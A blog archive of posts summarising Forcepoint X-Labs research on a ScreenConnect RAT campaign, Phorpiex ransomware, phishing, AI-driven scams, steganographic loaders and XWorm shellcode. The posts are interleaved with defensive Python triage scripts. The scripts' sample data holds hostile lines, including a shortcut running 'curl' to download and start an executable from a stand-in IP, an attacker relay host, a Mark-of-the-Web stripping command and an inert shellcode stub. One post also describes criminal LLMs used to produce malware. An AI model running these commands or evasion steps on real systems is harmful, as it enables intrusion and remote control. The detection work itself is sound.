Archive for Forcepoint X-Labs

Forcepoint X-Labs Uncovers SmartScreen Evasion Campaign Abusing ScreenConnect for Persistent Remote Access

Posted in Commentary with tags on February 11, 2026 by itnerd

In a post authored by Mayur Sewani, Senior Security Researcher, Forcepoint X-Labs researchers describe what they observed:

A campaign in which a spoofed email impersonating the U.S. Social Security Administration delivers a malicious attachment designed for silent execution and privilege escalation.

The attachment's script disables Windows SmartScreen, removes the Mark-of-the-Web, and installs a legitimate ScreenConnect client that is then abused as a Remote Access Trojan (RAT) to maintain command-and-control access.

Notably, the ScreenConnect client analyzed was signed with a certificate that had been explicitly revoked, underscoring how attackers are leveraging trusted tooling to evade detection. 

The compromised host ultimately establishes encrypted communications with a remote server linked to Iranian network infrastructure, enabling data exfiltration activity. 

Why This Matters

This research highlights a growing defensive challenge: attackers increasingly bypass traditional security controls by modifying system protections and repurposing legitimate IT management software. The findings reinforce the need for organizations to block revoked software, enforce strict RMM allowlists, and monitor for security-control tampering.
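The three recommendations above can be turned into concrete detections. The following Python is an added example, not anything from the Forcepoint post: it runs three rules over constructed telemetry records (a SmartScreen registry value set to Off, a PowerShell script block that strips the Zone.Identifier stream, and a ScreenConnect client whose h= relay parameter is not on the organisation's allowlist). The two registry paths are real SmartScreen locations but not an exhaustive list; the hostnames, file paths, field names and rule names are invented for the example, and checking a signer certificate against a CRL is left out because that needs the Windows certificate chain engine rather than an offline script.

```python
"""Rule-based triage for the three behaviours described above: SmartScreen
switched off through the registry, the Mark-of-the-Web stripped, and a
ScreenConnect client pointed at a relay nobody approved.

Added example, not Forcepoint's detection content. The event dicts below are
constructed to resemble normalised Sysmon / PowerShell script-block telemetry;
the field names and rule names are this script's own convention.
"""
import re
from urllib.parse import parse_qs

# Two registry locations that govern SmartScreen, mapped to the data values that
# switch it off. Not exhaustive: add the Edge/Store policy values your fleet uses.
SMARTSCREEN_OFF = {
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SmartScreenEnabled": {"off"},
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows\System\EnableSmartScreen": {"0", "dword (0x00000000)"},
}

# PowerShell idioms that strip the Zone.Identifier stream (the Mark-of-the-Web).
MOTW_STRIP = re.compile(r"unblock-file|zone\.identifier", re.IGNORECASE)

# ConnectWise ScreenConnect client binaries.
SCREENCONNECT_IMAGES = {"screenconnect.clientservice.exe", "screenconnect.windowsclient.exe"}


def relay_host(cmdline: str):
    """Return the relay named by h= in a ScreenConnect client launch string.

    The client is started with a query-string style argument such as
    "?e=Access&y=Guest&h=<relay>&p=<port>&s=...&k=..."; h= is the host the
    agent calls back to, which is the thing an RMM allowlist should key on.
    """
    m = re.search(r'\?([^"\s]+)', cmdline)
    if not m:
        return None
    hosts = parse_qs(m.group(1)).get("h")
    return hosts[0].lower() if hosts else None


def triage(events, allowed_relays):
    """Apply the three rules to normalised events; return (rule, detail) hits."""
    allowed = {h.lower() for h in allowed_relays}
    hits = []
    for ev in events:
        kind = ev["kind"]
        if kind == "registry_set":
            path, data = ev["path"], ev["data"].strip().lower()
            if path in SMARTSCREEN_OFF and data in SMARTSCREEN_OFF[path]:
                hits.append(("smartscreen_disabled", f"{ev['image']} set {path} = {ev['data']}"))
        elif kind == "script_block":
            if MOTW_STRIP.search(ev["script"]):
                hits.append(("motw_removed", ev["script"][:80]))
        elif kind == "process_create":
            image = ev["image"].rsplit("\\", 1)[-1].lower()
            if image in SCREENCONNECT_IMAGES:
                relay = relay_host(ev["cmdline"])
                if relay not in allowed:
                    hits.append(("rmm_relay_not_allowlisted", f"{image} -> {relay}"))
    return hits


# Constructed sample telemetry, loosely modelled on the chain described above.
# Hostnames and paths are invented; the last event is benign noise.
SAMPLE_EVENTS = [
    {"kind": "registry_set",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "path": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SmartScreenEnabled",
     "data": "Off"},
    {"kind": "script_block",
     "script": r"Unblock-File -Path $env:TEMP\SSA_Statement.exe; Start-Process $env:TEMP\SSA_Statement.exe"},
    {"kind": "process_create",
     "image": r"C:\Program Files (x86)\ScreenConnect Client (1a2b3c)\ScreenConnect.ClientService.exe",
     "cmdline": r'"C:\Program Files (x86)\ScreenConnect Client (1a2b3c)\ScreenConnect.ClientService.exe" '
                r'"?e=Access&y=Guest&h=relay.attacker-example.net&p=8041&s=1111-1111&k=abc"'},
    {"kind": "process_create",
     "image": r"C:\Program Files (x86)\ScreenConnect Client (9f8e7d)\ScreenConnect.ClientService.exe",
     "cmdline": r'"C:\Program Files (x86)\ScreenConnect Client (9f8e7d)\ScreenConnect.ClientService.exe" '
                r'"?e=Access&y=Guest&h=support.corp-example.com&p=443&s=2222-2222&k=def"'},
    {"kind": "registry_set",
     "image": r"C:\Windows\explorer.exe",
     "path": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "data": "1"},
]

APPROVED_RELAYS = ["support.corp-example.com"]   # the organisation's own ScreenConnect relay


def sample_hits():
    return triage(SAMPLE_EVENTS, APPROVED_RELAYS)


if __name__ == "__main__":
    for rule, detail in sample_hits():
        print(f"[{rule}] {detail}")
```

Keying the RMM rule on the relay host rather than on the binary's path or hash is deliberate: the client the campaign drops is a genuine, signed ScreenConnect build, so the only thing that separates it from the IT department's copy is where it phones home.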

You can read the research here: ScreenConnect Attack: SmartScreen Bypass and RMM Abuse

Forcepoint X-Labs Uncovers Low-Noise Phorpiex Campaign Delivering Offline ‘Global Group’ Ransomware

Posted in Commentary with tags on February 9, 2026 by itnerd

Today, the researchers at Forcepoint X-Labs released findings on a high-volume phishing campaign leveraging the Phorpiex botnet to deliver Global Group ransomware, demonstrating how familiar file types and low-friction attack chains continue to enable high-impact compromises.

In the post, authored by Lydia McElligott, Senior Security Researcher, the X-Labs researchers observed the following:

  • Weaponized Windows shortcut (.lnk) attachments: Attackers disguise the file as a normal document using double extensions, allowing a single click to trigger code execution. 
  • Stealthy multi-stage execution: The shortcut launches command-line tools that download and execute the payload with no visible installer. 
  • Offline “mute” ransomware: Global Group operates locally without contacting command-and-control infrastructure and generates encryption keys on the host, enabling execution even in air-gapped environments. 
  • No data exfiltration required: The ransomware conducts all activity locally, increasing the likelihood of evading detection strategies that rely on suspicious network traffic. 
  • Aggressive anti-forensics: Artifact removal and self-deletion techniques make detection and recovery particularly challenging. 
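The first two bullets describe a file format a gateway can parse rather than merely block on extension. The following Python is an added example, not Forcepoint's sample or code: it builds a constructed shortcut that is named like an invoice PDF but relaunches cmd.exe, parses it following the MS-SHLLINK ShellLinkHeader and StringData layout, and returns the reasons it should be held. The file name, paths and the 203.0.113.10 address (a documentation range) are invented.

```python
"""Build a constructed .lnk, parse it the way a mail-gateway triage script
would, and flag the tells in the campaign above: a double extension and a
shortcut whose real target is a command interpreter.

Added example, not Forcepoint's sample or code. The shortcut bytes are
constructed here; the layout follows the MS-SHLLINK ShellLinkHeader and
StringData sections (no LinkTargetIDList or LinkInfo in the sample, but the
parser skips them when present).
"""
import struct

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1).
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 1 << 0, 1 << 1
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 1 << 2, 1 << 3, 1 << 4
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 1 << 5, 1 << 6, 1 << 7

# StringData fields in file order, each gated by its LinkFlags bit.
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION)]

LAUNCHERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
             "cscript.exe", "rundll32.exe", "regsvr32.exe"}
DOC_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
FETCH_HINTS = ("http://", "https://", "downloadstring", "downloadfile", "-enc", "curl ",
               "bitsadmin", "certutil", "invoke-webrequest")


def build_lnk(relative_path, arguments, working_dir="", icon="", show_command=7):
    """Serialise a minimal Unicode shortcut: 76-byte header plus StringData."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS
    flags |= HAS_WORKING_DIR if working_dir else 0
    flags |= HAS_ICON_LOCATION if icon else 0
    # HeaderSize, CLSID, LinkFlags, FileAttributes, three FILETIMEs, FileSize,
    # IconIndex, ShowCommand (7 = SW_SHOWMINNOACTIVE), HotKey, three reserved fields.
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def sd(s):  # CountCharacters (UTF-16 code units) then the string, no terminator
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = sd(relative_path)
    body += sd(working_dir) if working_dir else b""
    body += sd(arguments)
    body += sd(icon) if icon else b""
    return header + body


def parse_lnk(data):
    """Skip the optional IDList and LinkInfo, then read each gated StringData field."""
    if len(data) < HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            fields[name] = ""
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        nbytes = count * 2 if unicode else count
        raw = data[pos + 2:pos + 2 + nbytes]
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
        pos += 2 + nbytes
    return fields


def triage_shortcut(filename, fields):
    """Return the reasons a shortcut attachment deserves a second look."""
    reasons = []
    stem = filename.lower()
    if stem.endswith(".lnk") and any(stem[:-4].endswith(e) for e in DOC_EXTENSIONS):
        reasons.append("double extension: document-looking name on a .lnk")
    target = fields["relative_path"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if target in LAUNCHERS:
        reasons.append(f"target is a command/script launcher: {target}")
    if fields["show_command"] == 7:
        reasons.append("window opens minimised (SW_SHOWMINNOACTIVE)")
    if any(h in fields["arguments"].lower() for h in FETCH_HINTS):
        reasons.append("arguments fetch or decode a remote payload")
    return reasons


# Constructed lure: named like a PDF, actually relaunches cmd.exe to pull a stage-2 binary
# from a documentation-range IP (203.0.113.0/24), as in the post's "no visible installer" chain.
SAMPLE_NAME = "Invoice_Feb2026.pdf.lnk"
SAMPLE_LNK = build_lnk(
    relative_path=r"..\..\..\Windows\System32\cmd.exe",
    arguments=r'/c curl -s -o %TEMP%\svc.exe http://203.0.113.10/svc.exe && start "" %TEMP%\svc.exe',
    icon=r"%SystemRoot%\System32\shell32.dll",
)


def sample_verdict():
    return triage_shortcut(SAMPLE_NAME, parse_lnk(SAMPLE_LNK))


if __name__ == "__main__":
    print("\n".join(sample_verdict()))
```

The parser reads ShowCommand as well as the strings because a value of 7 (minimised, no activation) is a cheap way to keep the console out of the victim's sight. A gateway in production would also walk the LinkTargetIDList, which the constructed sample omits; the parser skips it correctly when present.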

Bigger Picture

This campaign highlights how long-standing malware families remain effective when paired with reliable phishing techniques, reinforcing the need for organizations to prioritize endpoint behavior monitoring rather than relying solely on network signals. 

Here’s a link to the full findings: https://www.forcepoint.com/blog/x-labs/phorpiex-global-group-ransomware-lnk-phishing

Scam alert: Docusign phishing meets holiday loan scam

Posted in Commentary with tags on December 22, 2025 by itnerd

Forcepoint has a report that is literally hot off the press that covers something that I have personally experienced today.

With holiday financial stress peaking, Forcepoint has uncovered a sophisticated two-pronged scam campaign. Scammers are now pairing Docusign-themed phishing to hijack corporate credentials with convincing loan offer spam designed for identity theft.

The first threat uses spoofed ‘wine order’ documents to lure employees into entering logins on fake pages. Simultaneously, ‘Christmas Cheer Cash’ lures use professional marketing layouts to walk victims through a ‘loan application’ that harvests SSNs and bank details. I have received phishing emails matching the description of the first threat. These attacks are effective because they mimic standard end-of-year workflows.

You can get more details here: https://www.forcepoint.com/blog/x-labs/docusign-phishing-holiday-loan-spam

AI-powered Black Friday Scams Are Evolving Fast: Forcepoint X-Labs

Posted in Commentary with tags on November 14, 2025 by itnerd

Here’s a timely piece of research just published by Forcepoint’s X-Labs team and authored by Lydia McElligott, Security Researcher, titled “How AI is Fueling a New Wave of Black Friday Scams” 

Given the upcoming holiday sales surge, this one (with a number of visual examples included) hits at the intersection of cybersecurity, retail behavior and the AI threat landscape.

Three key take-aways from the research:

  • AI is raising the stakes. Scams this year don’t look like the old “cheap deal” bait—they’re polished, coherent and realistic: phishing emails that mirror brand templates, cloned retail websites spun up in minutes, fake social-media ads. 
  • Trusted brands are primary targets. Attackers are leveraging familiarity with brands like Amazon, Temu and luxury labels to build trust and urgency in their scams. 
  • Defensive behaviours still work—but they require discipline. The article outlines actionable red flags: inspecting sender domains, hovering rather than clicking links, really questioning “too-good-to-be-true” discounts and using secure payment methods. 

The post is at: https://www.forcepoint.com/blog/x-labs/black-friday-scams-ai-phishing-guide

Forcepoint X-Labs Publishes Research on Escalating AI Cybersecurity Arms Race

Posted in Commentary with tags on October 17, 2025 by itnerd

Forcepoint X-Labs has released a new post by researcher Jyotika Singh, a deep dive into the accelerating AI cybersecurity arms race. The post details how artificial intelligence is simultaneously empowering defenders with real-time detection while helping adversaries automate deception at massive scale. Its central finding is that every algorithm built for protection can now be turned to exploitation, making speed and continuous adaptation the only sustainable advantages. The analysis highlights that the challenge for security leaders is no longer whether to use AI, but how to stay ahead of sophisticated, AI-enabled adversaries.

Key highlights from the research include:

  • Adversaries are leveraging malicious LLM variants (such as FraudGPT and WormGPT) to automate phishing kit creation, malware generation, and massively scale social engineering operations. 
  • Deepfake technology has fully graduated from theory to multi-million-dollar real-world fraud, exemplified by a confirmed £20M video-call scam that impersonated company officers for a fraudulent transfer. 
  • Attackers are using Reinforcement Learning (RL) to train generative models to automatically evolve polymorphic payloads, creating malware that changes structure to evade endpoint security products. 
  • Defenders are fighting back with multi-layered ML/DNN classifiers and ‘Agentic AI’ systems, cutting average dwell time by automating real-time threat detection and high-volume tasks like alert triage. 
  • Actionable recommendations for organizations, including enforcing out-of-band verification for high-value transfers and continuously red-teaming internal ML models against adversarial inputs.

This research reinforces that the future of cybersecurity will be decided by who adapts the fastest, and that human oversight paired with intelligent automation is critical to maintaining confidence in protection.

The full blog post can be found at https://www.forcepoint.com/blog/x-labs/ai-cybersecurity-arms-race

Forcepoint X-Labs Post: Sharp Rise in Obfuscated JavaScript & Steganography Enabling Malware Delivery

Posted in Commentary with tags on October 8, 2025 by itnerd

This morning, the researchers at Forcepoint X-Labs released new findings showing that in Q3 2025 organizations across industries saw a steep increase in campaigns built on JavaScript attachments that deliver a variety of information-stealing and RAT malware, such as DarkCloud, Remcos, Agent Tesla, and Formbook.

Authored by Senior Security Researcher Mayur Sewani, the post discusses (with supporting images and code) how attackers cloak their lures in everyday business communications: fake quotes, purchase orders, shipment alerts and even WeTransfer-style links, to slip past conventional filters and take advantage of recipients' trust. For this analysis, the X-Labs team reviewed thousands of email subject lines and found the same social engineering tactics being used repeatedly.

The JavaScript attachments act as downloaders, launching PowerShell and using steganography to deliver .NET-based RATs and infostealers. Advanced obfuscation, sandbox evasion, and process hollowing highlight the increasing sophistication of these attacks.
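As a worked illustration of the steganography step, here is an added Python example (not Forcepoint's code; the post does not disclose which hiding method the campaign used) that parses PNG chunks and reports the two loader-friendly variants: a payload appended after IEND and a payload stashed in a private ancillary chunk, in each case carved as a base64 run and checked for an MZ header. The image and the "payload" are constructed inside the script; pixel-level LSB hiding would need a different check.

```python
"""Triage a PNG for a payload riding inside it: bytes after IEND, or a
non-standard chunk, holding a base64 blob that decodes to a PE.

Added example, not Forcepoint's code or sample. The post does not say which
hiding technique the campaign used, so this covers the two loader-friendly
variants (append after IEND; stash in a private chunk); pixel-level LSB
hiding needs a different check. The PNG and the "payload" are constructed.
"""
import base64
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
STANDARD_CHUNKS = {b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tEXt", b"zTXt", b"iTXt", b"tRNS",
                   b"gAMA", b"cHRM", b"sRGB", b"iCCP", b"pHYs", b"tIME", b"bKGD", b"sBIT",
                   b"hIST", b"sPLT"}
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")   # long base64 run, optional padding


def chunk(ctype, body):
    """Serialise one chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def tiny_png(extra_chunks=()):
    """A valid 1x1 truecolour PNG, with any extra chunks spliced in before IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # width, height, depth, colour type, ...
    idat = zlib.compress(b"\x00\xff\x00\x00")              # filter byte + one red pixel
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + b"".join(extra_chunks) + chunk(b"IEND", b"")


def parse_png(data):
    """Return ([(type, body), ...], offset just past IEND); stop at IEND or truncation."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, chunks = len(PNG_SIG), []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack_from(">I4s", data, pos)
        chunks.append((ctype, data[pos + 8:pos + 8 + length]))
        pos += 12 + length                                 # length + type + data + CRC
        if ctype == b"IEND":
            break
    return chunks, pos


def carve_payload(blob):
    """Decode the first long base64 run in blob; report whether it starts with an MZ header."""
    for m in B64_RUN.finditer(blob):
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except ValueError:                                 # binascii.Error is a ValueError
            continue
        return decoded, decoded[:2] == b"MZ"
    return None, False


def triage_png(data):
    """Findings: data after IEND, non-standard chunks, and any carved payload."""
    findings, regions = [], []
    chunks, end = parse_png(data)
    for ctype, body in chunks:
        if ctype not in STANDARD_CHUNKS:
            findings.append(f"non-standard chunk {ctype.decode('latin-1')} ({len(body)} bytes)")
            regions.append(body)
    if end < len(data):
        findings.append(f"{len(data) - end} bytes after IEND")
        regions.append(data[end:])
    for region in regions:
        decoded, is_pe = carve_payload(region)
        if decoded is not None:
            findings.append(f"base64 payload of {len(decoded)} bytes" + (" (PE header)" if is_pe else ""))
    return findings


# Constructed stand-in for a dropped executable: MZ stub padded out, nothing runnable.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 120
B64 = base64.b64encode(FAKE_PE)
# Variant 1: appended after IEND between marker strings a loader can search for.
APPENDED = tiny_png() + b"<<BASE64_START>>" + B64 + b"<<BASE64_END>>"
# Variant 2: tucked into a private ancillary chunk that image viewers ignore.
CHUNKED = tiny_png([chunk(b"prVt", B64)])
CLEAN = tiny_png()


def findings():
    return {"appended": triage_png(APPENDED), "chunked": triage_png(CHUNKED), "clean": triage_png(CLEAN)}


if __name__ == "__main__":
    for name, found in findings().items():
        print(name, found or "nothing found")
```

Both variants survive a normal image viewer, which is the point of the technique: the decoder stops at IEND and ignores chunks it does not know, so the file renders as a harmless picture while the script that fetched it pulls the blob back out with a string search.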

Sewani recommends that organizations combine advanced email filtering, endpoint protection, and user awareness to mitigate these threats.

The full post can be found at: https://www.forcepoint.com/blog/x-labs/q3-2025-threat-brief-obfuscated-javascript-steganography

NEW FROM FORCEPOINT X-LABS: XWorm RAT Delivered via Shellcode

Posted in Commentary with tags on September 26, 2025 by itnerd

This morning, the researchers from Forcepoint X-Labs released a new blog post detailing how attackers are using shellcode, an old technique, as the enabling step in a modern remote access trojan infection. The example in the post injects the XWorm RAT.

Campaign Highlights:

The campaign is delivered by phishing email, using a fake invoice as the lure. The infection sequence:

  • The email carries an Office add-in (.xlam) attachment which, when downloaded and opened, displays a blank or seemingly corrupted workbook. 
  • The document embeds an oleObject1.bin file that conceals the shellcode. 
  • When executed, the shellcode connects out to retrieve and deploy a secondary payload.
  • That second payload, an executable, is a .NET binary that is reflectively loaded into memory.
  • The second-stage DLL, run from memory, uses heavily obfuscated packing and encryption.
  • The final step performs process injection into its own main executable, maintaining persistence and exfiltrating data to its command-and-control servers. 
  • The C2 servers receiving the exfiltrated data were found to be associated with the XWorm family.
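A first triage step for a sample like this is to unpack the add-in and look at what the embedded object actually contains. The following Python is an added example rather than Forcepoint's code: it builds a constructed .xlam (an OOXML zip) holding a single xl/embeddings/oleObject1.bin, then scans that object for generic position-independent-shellcode idioms: the cld;call prologue, fs:[0x30] and gs:[0x60] PEB reads, and the call/pop GetPC trick. The byte patterns are general x86/x64 idioms, not indicators taken from the campaign, and the object contents are invented.

```python
"""Pull the embedded OLE objects out of an Office add-in (.xlam is an OOXML
zip) and scan each for the byte idioms that position-independent shellcode
leans on, which is where triage of the chain above starts.

Added example, not Forcepoint's code or sample. The workbook is constructed
here as a zip holding one xl/embeddings/oleObject1.bin; the patterns are
generic x86/x64 shellcode idioms (GetPC call/pop, PEB walks, the cld;call
prologue), not indicators from the campaign.
"""
import io
import re
import zipfile

# Byte idioms typical of the first instructions of position-independent shellcode.
SHELLCODE_IDIOMS = {
    "x86 PEB walk (mov reg, fs:[0x30])": re.compile(
        rb"\x64\x8b[\x05\x0d\x15\x1d\x35\x3d]\x30\x00\x00\x00"   # mov r32, fs:[0x30]
        rb"|\x64\xa1\x30\x00\x00\x00"                             # mov eax, fs:[0x30]
        rb"|\x64\x8b[\x40-\x7f]\x30"),                            # mov r32, fs:[reg+0x30]
    "x64 PEB walk (mov rax, gs:[0x60])": re.compile(rb"\x65\x48\x8b\x04\x25\x60\x00\x00\x00"),
    "GetPC call/pop": re.compile(rb"\xe8\x00\x00\x00\x00[\x58-\x5f]"),          # call $+5; pop r32
    "cld; call forward (block_api style)": re.compile(rb"\xfc\xe8[\x00-\xff]{2}\x00\x00"),
    "x64 prologue (cld; and rsp,-16; call)": re.compile(rb"\xfc\x48\x83\xe4\xf0\xe8"),
}
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # compound-file (OLE2) header signature


def embedded_objects(doc):
    """Return {member name: bytes} for every embedded object in an OOXML package."""
    with zipfile.ZipFile(io.BytesIO(doc)) as z:
        return {n: z.read(n) for n in z.namelist() if "/embeddings/" in n.lower()}


def scan_blob(blob):
    """Return [(idiom, offset), ...] for every shellcode idiom found in a blob."""
    return [(label, m.start()) for label, pat in SHELLCODE_IDIOMS.items() for m in pat.finditer(blob)]


def triage_workbook(doc):
    """Map each embedded object to its shellcode hits; an object with none gets an empty list."""
    return {name: scan_blob(blob) for name, blob in embedded_objects(doc).items()}


def build_xlam(ole_blob):
    """Constructed stand-in for an .xlam: a zip with the parts a scanner cares about."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")           # placeholders, not a valid workbook
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/embeddings/oleObject1.bin", ole_blob)
    return buf.getvalue()


# Constructed oleObject1.bin: OLE signature, filler, then a stub that reads the PEB
# through fs:[0x30] and, later, a call/pop GetPC sequence. Not executable as-is.
STUB = (b"\xfc\xe8\x82\x00\x00\x00"      # cld; call +0x82
        b"\x60\x89\xe5\x31\xc0"          # pushad; mov ebp, esp; xor eax, eax
        b"\x64\x8b\x50\x30"              # mov edx, fs:[eax+0x30]   -> PEB
        b"\x8b\x52\x0c\x8b\x52\x14")     # mov edx, [edx+0xc]; mov edx, [edx+0x14] -> Ldr lists
GETPC = b"\xe8\x00\x00\x00\x00\x5b"      # call $+5; pop ebx
OLE_OBJECT = OLE_MAGIC + b"\x00" * 504 + STUB + b"\x90" * 32 + GETPC + b"\x00" * 64
SAMPLE_XLAM = build_xlam(OLE_OBJECT)


def sample_report():
    return triage_workbook(SAMPLE_XLAM)


if __name__ == "__main__":
    for name, hits in sample_report().items():
        print(name, hits or "no shellcode idioms")
```

The offsets into the OLE object are what you would hand to a disassembler or emulator next; the scanner deliberately does not try to execute the stub, and a clean object yields an empty hit list rather than an error.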

Authored by Prashant Kumar, Senior Researcher at Forcepoint, the full post, with a detailed and illustrated walk-through, can be found at: https://www.forcepoint.com/blog/x-labs/xworm-rat-shellcode-multi-stage-analysis